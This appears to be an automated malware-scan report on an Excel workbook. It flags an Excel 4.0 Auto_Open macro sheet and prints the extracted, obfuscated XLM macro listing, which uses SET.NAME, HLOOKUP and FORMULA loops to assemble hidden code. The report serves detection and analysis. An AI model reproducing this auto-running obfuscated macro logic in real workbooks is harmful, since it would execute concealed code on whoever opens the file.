MALICIOUS
Risk Score: 140
Heuristics 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6600 bytes |

SHA-256: 03f07da13363dde2d93c6aed241d758985fece39e0593596dadbb52b492ed848
Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 17 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - tSvfQxqJ
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F156
' 0018 20 LABEL : Cell Value, String Constant - BlFMK len=0
' 0018 26 LABEL : Cell Value, String Constant - EPHDvfTOotD len=0
' 0018 23 LABEL : Cell Value, String Constant - GgiyfvQP len=0
' 0018 25 LABEL : Cell Value, String Constant - griXAnnUVj len=0
' 0018 26 LABEL : Cell Value, String Constant - iNvUGjgVxUf len=0
' 0018 21 LABEL : Cell Value, String Constant - KeNGiU len=0
' 0018 26 LABEL : Cell Value, String Constant - nyGfYSHKQNG len=0
' 0018 23 LABEL : Cell Value, String Constant - NzrIQRsj len=0
' 0018 27 LABEL : Cell Value, String Constant - oVBnwegmkjDa len=0
' 0018 23 LABEL : Cell Value, String Constant - pLpbUCNw len=0
' 0018 22 LABEL : Cell Value, String Constant - PxGVrpT len=0
' 0018 24 LABEL : Cell Value, String Constant - QoPXDVUSq len=0
' 0018 22 LABEL : Cell Value, String Constant - rFEyMaw len=0
' 0018 25 LABEL : Cell Value, String Constant - tYaTAtoNSl len=0
' 0018 20 LABEL : Cell Value, String Constant - uycXd len=0
' 0018 25 LABEL : Cell Value, String Constant - VUUIyjMuOv len=0
' 0018 20 LABEL : Cell Value, String Constant - xWVAD len=0
' 0018 22 LABEL : Cell Value, String Constant - yZKdLKP len=0
' 0018 22 LABEL : Cell Value, String Constant - zgcGMQM len=0
' 0018 27 LABEL : Cell Value, String Constant - ZHORlgYCGGew len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' tSvfQxqJ,F63,"SET.NAME("GgiyfvQP",VALUE("0"))",""
' tSvfQxqJ,F68,"SET.NAME("nyGfYSHKQNG",GgiyfvQP)",""
' tSvfQxqJ,F73,"SET.NAME("oVBnwegmkjDa",GgiyfvQP)",""
' tSvfQxqJ,F76,"SET.NAME("rFEyMaw",COUNTA(KeNGiU))",""
' tSvfQxqJ,F80,"SET.NAME("iNvUGjgVxUf",COUNTA(pLpbUCNw))",""
' tSvfQxqJ,F84,[],""
' tSvfQxqJ,F86,"SET.NAME("VUUIyjMuOv","")",""
' tSvfQxqJ,F88,"nyGfYSHKQNG",""
' tSvfQxqJ,F93,"SET.NAME("EPHDvfTOotD",HLOOKUP("*",KeNGiU,nyGfYSHKQNG,FALSE))",""
' tSvfQxqJ,F97,"NzrIQRsj",""
' tSvfQxqJ,F100,"SET.NAME("tYaTAtoNSl",GgiyfvQP)",""
' tSvfQxqJ,F104,[],""
' tSvfQxqJ,F107,"tYaTAtoNSl",""
' tSvfQxqJ,F111,"xWVAD",""
' tSvfQxqJ,F116,"yZKdLKP",""
' tSvfQxqJ,F120,"ZHORlgYCGGew",""
' tSvfQxqJ,F125,"SET.NAME("griXAnnUVj",VALUE(HLOOKUP("*",pLpbUCNw,ZHORlgYCGGew,FALSE)))",""
' tSvfQxqJ,F127,"uycXd",""
' tSvfQxqJ,F130,"VUUIyjMuOv",""
' tSvfQxqJ,F133,"oVBnwegmkjDa",""
' tSvfQxqJ,F138,NEXT(),""
' tSvfQxqJ,F140,"BlFMK",""
' tSvfQxqJ,F144,"SET.NAME("f",INT(T(FORMULA(T(VUUIyjMuOv)&"",""&T(BlFMK)))))",""
' tSvfQxqJ,F147,"PxGVrpT",""
' tSvfQxqJ,F149,NEXT(),""
' tSvfQxqJ,F151,RETURN(),""
' tSvfQxqJ,F182,"SET.NAME("zgcGMQM",F63)",""
' tSvfQxqJ,F185,"KeNGiU",""
' tSvfQxqJ,F189,"SET.NAME("pLpbUCNw",R52C13)",""
' tSvfQxqJ,F192,"SET.NAME("PxGVrpT",201)",""
' tSvfQxqJ,F196,"SET.NAME("QoPXDVUSq",6)",""
' tSvfQxqJ,F200,zgcGMQM(),""
' tSvfQxqJ,F201,HALT(),""